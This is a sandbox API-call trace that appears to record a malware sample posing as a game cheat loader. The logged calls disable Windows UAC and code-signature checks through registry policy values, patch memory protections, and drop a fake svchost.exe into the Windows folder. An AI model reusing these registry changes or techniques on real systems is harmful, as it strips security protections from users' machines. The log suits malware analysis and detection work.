lpRect=0x13ff1cc) returned 1 [0068.034] GetClientRect (in: hWnd=0x302c8, lpRect=0x13ff12c | out: lpRect=0x13ff12c) returned 1 [0068.034] GetWindowRect (in: hWnd=0x302c8, lpRect=0x13ff12c | out: lpRect=0x13ff12c) returned 1 [0068.035] SysReAllocStringLen (in: pbstr=0x13ff128*=0x0, psz="comctl32.dll", len=0xc | out: pbstr=0x13ff128*="comctl32.dll") returned 1 [0068.035] CharLowerBuffW (in: lpsz="comctl32.dll", cchLength=0xc | out: lpsz="comctl32.dll") returned 0xc [0068.035] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6fb20000 [0068.035] GetWindowLongW (hWnd=0x302c8, nIndex=-16) returned 114229248 [0068.035] GetProcAddress (hModule=0x750c0000, lpProcName="GetWindowTextLength") returned 0x0 [0068.036] GetProcAddress (hModule=0x750c0000, lpProcName="GetWindowTextLengthW") returned 0x750ccc40 [0068.036] GetWindowTextLengthW (hWnd=0x302c8) returned 10 [0068.036] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xa [0068.036] GetProcAddress (hModule=0x750c0000, lpProcName="GetSystemMetrics") returned 0x750eddc0 [0068.036] GetSystemMetrics (nIndex=42) returned 0 [0068.036] GetProcAddress (hModule=0x750c0000, lpProcName="GetWindowText") returned 0x0 [0068.037] GetProcAddress (hModule=0x750c0000, lpProcName="GetWindowTextW") returned 0x750ceac0 [0068.037] GetWindowTextW (in: hWnd=0x302c8, lpString=0x13ff0c4, nMaxCount=11 | out: lpString="TROLLED!!!") returned 10 [0068.037] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0xd, wParam=0xb, lParam=0x13ff0c4) returned 0xa [0068.037] GetWindowTextLengthW (hWnd=0x302c8) returned 10 [0068.037] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xa [0068.037] GetSystemMetrics (nIndex=42) returned 0 [0068.037] GetWindowTextW (in: hWnd=0x302c8, lpString=0x13ff0c4, nMaxCount=11 | out: lpString="TROLLED!!!") returned 10 [0068.037] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0xd, wParam=0xb, lParam=0x13ff0c4) returned 0xa [0068.037] GetWindowLongW (hWnd=0x302c8, nIndex=-16) returned 114229248 [0068.037] GetWindowLongW (hWnd=0x302c8, nIndex=-20) returned 327936 [0068.037] SetWindowLongW (hWnd=0x302c8, nIndex=-16, dwNewLong=47120384) returned 114229248 [0068.038] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x7c, wParam=0xfffffff0, lParam=0x13ff10c) returned 0x0 [0068.038] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x7d, wParam=0xfffffff0, lParam=0x13ff10c) returned 0x0 [0068.040] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x70213 [0068.041] SetWindowLongW (hWnd=0x302c8, nIndex=-20, dwNewLong=327680) returned 327936 [0068.041] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x7c, wParam=0xffffffec, lParam=0x13ff10c) returned 0x0 [0068.041] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x7d, wParam=0xffffffec, lParam=0x13ff10c) returned 0x0 [0068.042] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowPos") returned 0x750f3e90 [0068.042] SetWindowPos (hWnd=0x302c8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0068.042] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x46, wParam=0x0, lParam=0x13ff144) returned 0x0 [0068.042] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x83, wParam=0x1, lParam=0x13ff11c) returned 0x0 [0068.044] GetWindowPlacement (in: hWnd=0x302c8, lpwndpl=0x13fee70 | out: lpwndpl=0x13fee70) returned 1 [0068.044] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x47, wParam=0x0, lParam=0x13ff144) returned 0x0 [0068.044] GetClientRect (in: hWnd=0x302c8, lpRect=0x13fee20 | out: lpRect=0x13fee20) returned 1 [0068.044] GetWindowRect (in: hWnd=0x302c8, lpRect=0x13fee20 | out: lpRect=0x13fee20) returned 1 [0068.045] GetProcAddress (hModule=0x750c0000, lpProcName="RedrawWindow") returned 0x743c1b20 [0068.045] RedrawWindow (hWnd=0x302c8, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0068.045] GetSystemMenu (hWnd=0x302c8, bRevert=0) returned 0x1410089 [0068.045] GetWindowPlacement (in: hWnd=0x302c8, lpwndpl=0x13ff178 | out: lpwndpl=0x13ff178) returned 1 [0068.045] EnableMenuItem (hMenu=0x1410089, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0068.045] EnableMenuItem (hMenu=0x1410089, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0068.045] EnableMenuItem (hMenu=0x1410089, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0068.045] EnableMenuItem (hMenu=0x1410089, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0068.045] EnableMenuItem (hMenu=0x1410089, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0068.045] GetProcAddress (hModule=0x750c0000, lpProcName="ShowWindow") returned 0x750f3ee0 [0068.046] ShowWindow (hWnd=0x302c8, nCmdShow=5) returned 0 [0068.046] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0068.046] GetWindowTextLengthW (hWnd=0x302c8) returned 10 [0068.046] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xa [0068.046] GetSystemMetrics (nIndex=42) returned 0 [0068.046] GetWindowTextW (in: hWnd=0x302c8, lpString=0x13fed64, nMaxCount=11 | out: lpString="TROLLED!!!") returned 10 [0068.046] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0xd, wParam=0xb, lParam=0x13fed64) returned 0xa [0068.113] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", ulOptions=0x0, samDesired=0x2001f, phkResult=0x13fedd0 | out: phkResult=0x13fedd0*=0x40c) returned 0x0 [0068.116] RegQueryValueExW (in: hKey=0x40c, lpValueName="ConsentPromptBehaviorAdmin", lpReserved=0x0, lpType=0x13fedc0, lpData=0x0, lpcbData=0x13fedbc*=0x0 | out: lpType=0x13fedc0*=0x4, lpData=0x0, lpcbData=0x13fedbc*=0x4) returned 0x0 [0068.117] GetProcAddress (hModule=0x756e0000, lpProcName="RegSetValueEx") returned 0x0 [0068.117] GetProcAddress (hModule=0x756e0000, lpProcName="RegSetValueExW") returned 0x756ff530 [0068.196] RegSetValueExW (in: hKey=0x40c, lpValueName="ConsentPromptBehaviorAdmin", Reserved=0x0, dwType=0x4, lpData=0x13fede8*=0x5, cbData=0x4 | out: lpData=0x13fede8*=0x5) returned 0x0 [0068.196] RegQueryValueExW (in: hKey=0x40c, lpValueName="ConsentPromptBehaviorUser", lpReserved=0x0, lpType=0x13fedc0, lpData=0x0, lpcbData=0x13fedbc*=0x0 | out: lpType=0x13fedc0*=0x4, lpData=0x0, lpcbData=0x13fedbc*=0x4) returned 0x0 [0068.196] RegSetValueExW (in: hKey=0x40c, lpValueName="ConsentPromptBehaviorUser", Reserved=0x0, dwType=0x4, lpData=0x13fede8*=0x3, cbData=0x4 | out: lpData=0x13fede8*=0x3) returned 0x0 [0068.197] RegQueryValueExW (in: hKey=0x40c, lpValueName="dontdisplaylastusername", lpReserved=0x0, lpType=0x13fedc0, lpData=0x0, lpcbData=0x13fedbc*=0x0 | out: lpType=0x13fedc0*=0x4, lpData=0x0, lpcbData=0x13fedbc*=0x4) returned 0x0 [0068.197] RegSetValueExW (in: hKey=0x40c, lpValueName="dontdisplaylastusername", Reserved=0x0, dwType=0x4, lpData=0x13fede8*=0x0, cbData=0x4 | out: lpData=0x13fede8*=0x0) returned 0x0 [0068.197] RegQueryValueExW (in: hKey=0x40c, lpValueName="EnableInstallerDetection", lpReserved=0x0, lpType=0x13fedc0, lpData=0x0, lpcbData=0x13fedbc*=0x0 | out: lpType=0x13fedc0*=0x4, lpData=0x0, lpcbData=0x13fedbc*=0x4) returned 0x0 [0068.197] RegSetValueExW (in: hKey=0x40c, lpValueName="EnableInstallerDetection", Reserved=0x0, dwType=0x4, lpData=0x13fede8*=0x1, cbData=0x4 | out: lpData=0x13fede8*=0x1) returned 0x0 [0068.197] RegQueryValueExW (in: hKey=0x40c, lpValueName="EnableLUA", lpReserved=0x0, lpType=0x13fedc0, lpData=0x0, lpcbData=0x13fedbc*=0x0 | out: lpType=0x13fedc0*=0x4, lpData=0x0, lpcbData=0x13fedbc*=0x4) returned 0x0 [0068.197] RegSetValueExW (in: hKey=0x40c, lpValueName="EnableLUA", Reserved=0x0, dwType=0x4, lpData=0x13fede8*=0x0, cbData=0x4 | out: lpData=0x13fede8*=0x0) returned 0x0 [0068.197] RegQueryValueExW (in: hKey=0x40c, lpValueName="EnableSecureUIAPaths", lpReserved=0x0, lpType=0x13fedc0, lpData=0x0, lpcbData=0x13fedbc*=0x0 | out: lpType=0x13fedc0*=0x4, lpData=0x0, lpcbData=0x13fedbc*=0x4) returned 0x0 [0068.197] RegSetValueExW (in: hKey=0x40c, lpValueName="EnableSecureUIAPaths", Reserved=0x0, dwType=0x4, lpData=0x13fede8*=0x1, cbData=0x4 | out: lpData=0x13fede8*=0x1) returned 0x0 [0068.197] RegQueryValueExW (in: hKey=0x40c, lpValueName="EnableUIADesktopToggle", lpReserved=0x0, lpType=0x13fedc0, lpData=0x0, lpcbData=0x13fedbc*=0x0 | out: lpType=0x13fedc0*=0x4, lpData=0x0, lpcbData=0x13fedbc*=0x4) returned 0x0 [0068.197] RegSetValueExW (in: hKey=0x40c, lpValueName="EnableUIADesktopToggle", Reserved=0x0, dwType=0x4, lpData=0x13fede8*=0x5, cbData=0x4 | out: lpData=0x13fede8*=0x5) returned 0x0 [0068.197] RegQueryValueExW (in: hKey=0x40c, lpValueName="EnableVirtualization", lpReserved=0x0, lpType=0x13fedc0, lpData=0x0, lpcbData=0x13fedbc*=0x0 | out: lpType=0x13fedc0*=0x4, lpData=0x0, lpcbData=0x13fedbc*=0x4) returned 0x0 [0068.197] RegSetValueExW (in: hKey=0x40c, lpValueName="EnableVirtualization", Reserved=0x0, dwType=0x4, lpData=0x13fede8*=0x1, cbData=0x4 | out: lpData=0x13fede8*=0x1) returned 0x0 [0068.197] RegQueryValueExW (in: hKey=0x40c, lpValueName="FilterAdministratorToken", lpReserved=0x0, lpType=0x13fedc0, lpData=0x0, lpcbData=0x13fedbc*=0x0 | out: lpType=0x13fedc0*=0x4, lpData=0x0, lpcbData=0x13fedbc*=0x4) returned 0x0 [0068.197] RegSetValueExW (in: hKey=0x40c, lpValueName="FilterAdministratorToken", Reserved=0x0, dwType=0x4, lpData=0x13fede8*=0x0, cbData=0x4 | out: lpData=0x13fede8*=0x0) returned 0x0 [0068.198] RegQueryValueExW (in: hKey=0x40c, lpValueName="legalnoticecaption", lpReserved=0x0, lpType=0x13fedc0, lpData=0x0, lpcbData=0x13fedbc*=0x0 | out: lpType=0x13fedc0*=0x1, lpData=0x0, lpcbData=0x13fedbc*=0x2) returned 0x0 [0068.198] GetProcAddress (hModule=0x756e0000, lpProcName="RegSetValueEx") returned 0x0 [0068.198] GetProcAddress (hModule=0x756e0000, lpProcName="RegSetValueExW") returned 0x756ff530 [0068.198] RegSetValueExW (in: hKey=0x40c, lpValueName="legalnoticecaption", Reserved=0x0, dwType=0x1, lpData="", cbData=0x2 | out: lpData="") returned 0x0 [0068.198] RegQueryValueExW (in: hKey=0x40c, lpValueName="legalnoticetext", lpReserved=0x0, lpType=0x13fedc0, lpData=0x0, lpcbData=0x13fedbc*=0x0 | out: lpType=0x13fedc0*=0x1, lpData=0x0, lpcbData=0x13fedbc*=0x4) returned 0x0 [0068.199] RegSetValueExW (in: hKey=0x40c, lpValueName="legalnoticetext", Reserved=0x0, dwType=0x1, lpData="", cbData=0x2 | out: lpData="") returned 0x0 [0068.199] RegQueryValueExW (in: hKey=0x40c, lpValueName="PromptOnSecureDesktop", lpReserved=0x0, lpType=0x13fedc0, lpData=0x0, lpcbData=0x13fedbc*=0x0 | out: lpType=0x13fedc0*=0x4, lpData=0x0, lpcbData=0x13fedbc*=0x4) returned 0x0 [0068.199] RegSetValueExW (in: hKey=0x40c, lpValueName="PromptOnSecureDesktop", Reserved=0x0, dwType=0x4, lpData=0x13fede8*=0x1, cbData=0x4 | out: lpData=0x13fede8*=0x1) returned 0x0 [0068.199] RegQueryValueExW (in: hKey=0x40c, lpValueName="scforceoption", lpReserved=0x0, lpType=0x13fedc0, lpData=0x0, lpcbData=0x13fedbc*=0x0 | out: lpType=0x13fedc0*=0x4, lpData=0x0, lpcbData=0x13fedbc*=0x4) returned 0x0 [0068.199] RegSetValueExW (in: hKey=0x40c, lpValueName="scforceoption", Reserved=0x0, dwType=0x4, lpData=0x13fede8*=0x0, cbData=0x4 | out: lpData=0x13fede8*=0x0) returned 0x0 [0068.199] RegQueryValueExW (in: hKey=0x40c, lpValueName="shutdownwithoutlogon", lpReserved=0x0, lpType=0x13fedc0, lpData=0x0, lpcbData=0x13fedbc*=0x0 | out: lpType=0x13fedc0*=0x4, lpData=0x0, lpcbData=0x13fedbc*=0x4) returned 0x0 [0068.199] RegSetValueExW (in: hKey=0x40c, lpValueName="shutdownwithoutlogon", Reserved=0x0, dwType=0x4, lpData=0x13fede8*=0x1, cbData=0x4 | out: lpData=0x13fede8*=0x1) returned 0x0 [0068.199] RegQueryValueExW (in: hKey=0x40c, lpValueName="undockwithoutlogon", lpReserved=0x0, lpType=0x13fedc0, lpData=0x0, lpcbData=0x13fedbc*=0x0 | out: lpType=0x13fedc0*=0x4, lpData=0x0, lpcbData=0x13fedbc*=0x4) returned 0x0 [0068.199] RegSetValueExW (in: hKey=0x40c, lpValueName="undockwithoutlogon", Reserved=0x0, dwType=0x4, lpData=0x13fede8*=0x1, cbData=0x4 | out: lpData=0x13fede8*=0x1) returned 0x0 [0068.199] RegQueryValueExW (in: hKey=0x40c, lpValueName="ValidateAdminCodeSignatures", lpReserved=0x0, lpType=0x13fedc0, lpData=0x0, lpcbData=0x13fedbc*=0x0 | out: lpType=0x13fedc0*=0x4, lpData=0x0, lpcbData=0x13fedbc*=0x4) returned 0x0 [0068.199] RegSetValueExW (in: hKey=0x40c, lpValueName="ValidateAdminCodeSignatures", Reserved=0x0, dwType=0x4, lpData=0x13fede8*=0x0, cbData=0x4 | out: lpData=0x13fede8*=0x0) returned 0x0 [0068.199] RegCloseKey (hKey=0x40c) returned 0x0 [0068.205] GetProcAddress (hModule=0x772d0000, lpProcName="GetACP") returned 0x772e4ca0 [0068.224] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x13fe444, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10204, lpName="Global\\NLS_CodePage_1252_3_2_0_0") returned 0x40c [0068.224] GetCurrentThreadId () returned 0x13dc [0068.225] ResetEvent (hEvent=0x200) returned 1 [0068.225] GetCurrentThreadId () returned 0x13dc [0068.225] GetCurrentThreadId () returned 0x13dc [0068.225] GetCurrentThreadId () returned 0x13dc [0068.225] GetCurrentThreadId () returned 0x13dc [0068.225] ResetEvent (hEvent=0x200) returned 1 [0068.225] GetCurrentThreadId () returned 0x13dc [0068.225] GetCurrentThreadId () returned 0x13dc [0068.225] SetEvent (hEvent=0x20c) returned 1 [0068.225] SetEvent (hEvent=0x200) returned 1 [0068.225] GetCurrentThreadId () returned 0x13dc [0068.225] GetCurrentThreadId () returned 0x13dc [0068.225] GetCurrentThreadId () returned 0x13dc [0068.225] GetCurrentThreadId () returned 0x13dc [0068.225] GetCurrentThreadId () returned 0x13dc [0068.225] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0068.225] GetCurrentThreadId () returned 0x13dc [0068.225] GetCurrentThreadId () returned 0x13dc [0068.225] GetCurrentThreadId () returned 0x13dc [0068.225] SetEvent (hEvent=0x20c) returned 1 [0068.225] MapViewOfFile (hFileMappingObject=0x40c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x34e0000 [0068.230] SysReAllocStringLen (in: pbstr=0x13fe1a8*=0x0, psz="shell32.dll", len=0xb | out: pbstr=0x13fe1a8*="shell32.dll") returned 1 [0068.230] CharLowerBuffW (in: lpsz="shell32.dll", cchLength=0xb | out: lpsz="shell32.dll") returned 0xb [0068.230] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll", hFile=0x0, dwFlags=0x800) returned 0x0 [0068.230] GetLastError () returned 0x7e [0068.230] SetLastError (dwErrCode=0x7e) [0068.234] SysReAllocStringLen (in: pbstr=0x13fe1a8*=0x0, psz="shell32.dll", len=0xb | out: pbstr=0x13fe1a8*="shell32.dll") returned 1 [0068.234] CharLowerBuffW (in: lpsz="shell32.dll", cchLength=0xb | out: lpsz="shell32.dll") returned 0xb [0068.234] LoadLibraryExW (lpLibFileName="shell32.dll", hFile=0x0, dwFlags=0x800) returned 0x75760000 [0068.234] GetLastError () returned 0x0 [0068.235] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0068.235] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0068.235] GetModuleFileNameA (in: hModule=0x75760000, lpFilename=0x13fe08c, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0068.235] GetCurrentProcess () returned 0xffffffff [0068.235] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe190*=0x75c5ea14, NumberOfBytesToProtect=0x13fe194, NewAccessProtection=0x4, OldAccessProtection=0x13fe1c8 | out: BaseAddress=0x13fe190*=0x75c5e000, NumberOfBytesToProtect=0x13fe194, OldAccessProtection=0x13fe1c8*=0x2) returned 0x0 [0068.235] GetCurrentProcess () returned 0xffffffff [0068.235] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe190*=0x75c5ea14, NumberOfBytesToProtect=0x13fe194, NewAccessProtection=0x2, OldAccessProtection=0x13fe1c8 | out: BaseAddress=0x13fe190*=0x75c5e000, NumberOfBytesToProtect=0x13fe194, OldAccessProtection=0x13fe1c8*=0x4) returned 0x0 [0068.236] GetCurrentProcess () returned 0xffffffff [0068.236] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe190*=0x75c5ea18, NumberOfBytesToProtect=0x13fe194, NewAccessProtection=0x4, OldAccessProtection=0x13fe1c8 | out: BaseAddress=0x13fe190*=0x75c5e000, NumberOfBytesToProtect=0x13fe194, OldAccessProtection=0x13fe1c8*=0x2) returned 0x0 [0068.236] GetCurrentProcess () returned 0xffffffff [0068.236] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe190*=0x75c5ea18, NumberOfBytesToProtect=0x13fe194, NewAccessProtection=0x2, OldAccessProtection=0x13fe1c8 | out: BaseAddress=0x13fe190*=0x75c5e000, NumberOfBytesToProtect=0x13fe194, OldAccessProtection=0x13fe1c8*=0x4) returned 0x0 [0068.236] SetLastError (dwErrCode=0x0) [0068.237] GetProcAddress (hModule=0x75760000, lpProcName="SHGetFolderPath") returned 0x0 [0068.237] GetProcAddress (hModule=0x75760000, lpProcName="SHGetFolderPathW") returned 0x758b88f0 [0068.237] CoTaskMemAlloc (cb=0x20c) returned 0xe07b0 [0068.237] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0xe07b0 | out: pszPath="C:\\WINDOWS") returned 0x0 [0068.238] GetProcAddress (hModule=0x753c0000, lpProcName="CoTaskMemFree") returned 0x749b64b0 [0068.238] CoTaskMemFree (pv=0xe07b0) [0068.238] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x105, lpBuffer=0x13fe818, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0068.284] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", nBufferLength=0x105, lpBuffer=0x13fe794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", lpFilePart=0x0) returned 0x3a [0068.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x13fe6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0068.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x13fe6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0068.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x13fe714, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0068.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x13febc8) returned 1 [0068.294] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x13fec44 | out: lpFileInformation=0x13fec44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0068.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x13febc4) returned 1 [0068.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x13fe660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0068.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x13feba4) returned 1 [0068.294] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x410 [0068.294] GetFileType (hFile=0x410) returned 0x1 [0068.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x13feba0) returned 1 [0068.294] GetFileType (hFile=0x410) returned 0x1 [0068.297] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x13febd0 | out: lpFileSizeHigh=0x13febd0*=0x0) returned 0x8c8f [0068.298] ReadFile (in: hFile=0x410, lpBuffer=0x373e294, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13feb8c, lpOverlapped=0x0 | out: lpBuffer=0x373e294*, lpNumberOfBytesRead=0x13feb8c*=0x1000, lpOverlapped=0x0) returned 1 [0068.300] ReadFile (in: hFile=0x410, lpBuffer=0x373e294, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13feb3c, lpOverlapped=0x0 | out: lpBuffer=0x373e294*, lpNumberOfBytesRead=0x13feb3c*=0x1000, lpOverlapped=0x0) returned 1 [0068.300] ReadFile (in: hFile=0x410, lpBuffer=0x373e294, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13feab8, lpOverlapped=0x0 | out: lpBuffer=0x373e294*, lpNumberOfBytesRead=0x13feab8*=0x1000, lpOverlapped=0x0) returned 1 [0068.301] ReadFile (in: hFile=0x410, lpBuffer=0x373e294, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13feab8, lpOverlapped=0x0 | out: lpBuffer=0x373e294*, lpNumberOfBytesRead=0x13feab8*=0x1000, lpOverlapped=0x0) returned 1 [0068.301] ReadFile (in: hFile=0x410, lpBuffer=0x373e294, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13feab8, lpOverlapped=0x0 | out: lpBuffer=0x373e294*, lpNumberOfBytesRead=0x13feab8*=0x1000, lpOverlapped=0x0) returned 1 [0068.301] ReadFile (in: hFile=0x410, lpBuffer=0x373e294, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13feab8, lpOverlapped=0x0 | out: lpBuffer=0x373e294*, lpNumberOfBytesRead=0x13feab8*=0x1000, lpOverlapped=0x0) returned 1 [0068.301] ReadFile (in: hFile=0x410, lpBuffer=0x373e294, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13feb38, lpOverlapped=0x0 | out: lpBuffer=0x373e294*, lpNumberOfBytesRead=0x13feb38*=0x1000, lpOverlapped=0x0) returned 1 [0068.301] ReadFile (in: hFile=0x410, lpBuffer=0x373e294, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13feab8, lpOverlapped=0x0 | out: lpBuffer=0x373e294*, lpNumberOfBytesRead=0x13feab8*=0x1000, lpOverlapped=0x0) returned 1 [0068.301] ReadFile (in: hFile=0x410, lpBuffer=0x373e294, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13feab8, lpOverlapped=0x0 | out: lpBuffer=0x373e294*, lpNumberOfBytesRead=0x13feab8*=0xc8f, lpOverlapped=0x0) returned 1 [0068.301] ReadFile (in: hFile=0x410, lpBuffer=0x373e294, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13feb64, lpOverlapped=0x0 | out: lpBuffer=0x373e294*, lpNumberOfBytesRead=0x13feb64*=0x0, lpOverlapped=0x0) returned 1 [0068.302] CloseHandle (hObject=0x410) returned 1 [0068.302] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", nBufferLength=0x105, lpBuffer=0x13fe6ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", lpFilePart=0x0) returned 0x3a [0068.302] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", nBufferLength=0x105, lpBuffer=0x13fe710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", lpFilePart=0x0) returned 0x3a [0068.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x13febc4) returned 1 [0068.302] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x13fec40 | out: lpFileInformation=0x13fec40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0068.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x13febc0) returned 1 [0068.320] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fe9d4 | out: TokenHandle=0x13fe9d4*=0x410) returned 1 [0068.386] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fe9e4 | out: TokenHandle=0x13fe9e4*=0x418) returned 1 [0068.391] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\svchost.exe", nBufferLength=0x105, lpBuffer=0x13fe7b0, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\svchost.exe", lpFilePart=0x0) returned 0x16 [0068.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x13fecf4) returned 1 [0068.391] CreateFileW (lpFileName="C:\\WINDOWS\\svchost.exe" (normalized: "c:\\windows\\svchost.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x41c 